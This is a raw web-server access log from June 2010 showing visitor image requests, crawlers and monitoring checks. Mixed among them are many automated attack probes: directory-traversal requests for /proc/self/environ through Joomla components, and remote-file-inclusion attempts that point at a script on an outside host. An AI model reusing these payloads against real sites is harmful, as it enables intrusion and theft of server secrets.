92.36.192.210 - - [21/Jun/2010:00:12:28 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:28 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:28 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:28 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:28 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:28 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:28 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:28 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:28 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:28 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:29 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:29 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:29 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:29 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
121.88.4.74 - - [21/Jun/2010:00:12:32 -0400] "GET /logs/access_log.Q110060300/pingserver.php HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
121.88.4.74 - - [21/Jun/2010:00:12:32 -0400] "GET /logs/access_log.Q110060300/pingserver.php HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
92.36.192.210 - - [21/Jun/2010:00:12:33 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:33 -0400] "GET /images/items/2881000_THUMB.JPG HTTP/1.1" 200 3673 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:34 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:42 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:42 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:42 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:42 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:42 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:42 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:42 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:42 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:42 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:42 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:42 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:43 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
211.43.212.56 - - [21/Jun/2010:00:12:44 -0400] "GET /logs/access_log.Q110022700//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:12:45 -0400] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.822"
92.36.192.210 - - [21/Jun/2010:00:12:45 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
211.43.212.56 - - [21/Jun/2010:00:12:45 -0400] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
209.59.12.99 - - [21/Jun/2010:00:13:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.15.156.75 - - [21/Jun/2010:00:13:14 -0400] "GET /logs/index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
64.15.156.75 - - [21/Jun/2010:00:13:14 -0400] "GET /index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
64.15.156.75 - - [21/Jun/2010:00:13:14 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
95.108.245.251 - - [21/Jun/2010:00:12:40 -0400] "GET /logs/access_log.Q110010800 HTTP/1.1" 200 6023456 "-" "Yandex/1.01.001 (compatible; Win16; I)"
69.73.166.6 - - [21/Jun/2010:00:13:28 -0400] "GET /logs/access_log.Q109071600/errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:13:28 -0400] "GET /errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:13:28 -0400] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.832"
211.43.212.56 - - [21/Jun/2010:00:13:52 -0400] "GET /logs/access_log.Q109082000//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:13:52 -0400] "GET /logs/access_log.Q109082000//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:13:53 -0400] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:13:53 -0400] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:13:53 -0400] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:13:54 -0400] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
188.72.70.56 - - [21/Jun/2010:00:14:21 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:14:21 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
211.43.212.56 - - [21/Jun/2010:00:14:53 -0400] "GET /logs/access_log.Q110051600//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:14:53 -0400] "GET /logs/access_log.Q110051600//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:15:20 -0400] "GET /logs/access_log.Q110012000//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:15:20 -0400] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:15:21 -0400] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:15:28 -0400] "GET /logs/access_log.Q110012000//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:15:28 -0400] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:15:29 -0400] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
188.72.70.56 - - [21/Jun/2010:00:15:56 -0400] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
211.43.212.56 - - [21/Jun/2010:00:16:14 -0400] "GET /logs/access_log.Q110030500//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:16:27 -0400] "GET /logs/access_log.Q110030500//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
194.42.16.25 - - [21/Jun/2010:00:16:36 -0400] "GET /index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
194.42.16.25 - - [21/Jun/2010:00:16:36 -0400] "GET /logs/index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
194.42.16.25 - - [21/Jun/2010:00:16:36 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.228.62.66 - - [21/Jun/2010:00:16:42 -0400] "GET /logs/access_log.Q110061300/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
174.142.68.199 - - [21/Jun/2010:00:16:59 -0400] "GET /logs/access_log.Q110061300/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
188.72.70.56 - - [21/Jun/2010:00:17:01 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:17:01 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:17:02 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
67.228.62.66 - - [21/Jun/2010:00:17:07 -0400] "GET /logs/access_log.Q110061300/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
188.72.70.56 - - [21/Jun/2010:00:17:09 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
211.43.212.56 - - [21/Jun/2010:00:17:46 -0400] "GET /logs/access_log.Q109070700//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:17:46 -0400] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:17:47 -0400] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:17:51 -0400] "GET /logs/access_log.Q109070700//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:17:52 -0400] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:17:52 -0400] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
202.160.123.72 - - [21/Jun/2010:00:18:51 -0400] "GET /logs/access_log.Q110060300/pingserver.php HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
202.160.123.72 - - [21/Jun/2010:00:18:51 -0400] "GET /pingserver.php HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
202.160.123.72 - - [21/Jun/2010:00:18:52 -0400] "GET /logs/pingserver.php HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
209.59.12.99 - - [21/Jun/2010:00:21:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.43.212.56 - - [21/Jun/2010:00:21:51 -0400] "GET /logs/error_log.Q110012000//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:21:58 -0400] "GET /logs/error_log.Q110012000//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:22:11 -0400] "GET /logs/access_log.Q110053100//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:22:12 -0400] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:22:12 -0400] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
202.125.152.246 - - [21/Jun/2010:00:23:06 -0400] "GET /logs/access_log.Q110021600%20%20/viewbody.html?code=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
123.125.66.73 - - [21/Jun/2010:00:23:52 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
211.43.212.56 - - [21/Jun/2010:00:24:28 -0400] "GET /logs/access_log.Q110022700//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:24:28 -0400] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:24:29 -0400] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:24:35 -0400] "GET /logs/access_log.Q110030500//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
202.160.123.72 - - [21/Jun/2010:00:24:39 -0400] "GET /logs/error_log.Q110052500/pingserver.php HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
211.43.212.56 - - [21/Jun/2010:00:24:45 -0400] "GET /logs/error_log.Q110053100//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:24:48 -0400] "GET /logs/access_log.Q110022700//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:24:49 -0400] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:24:49 -0400] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
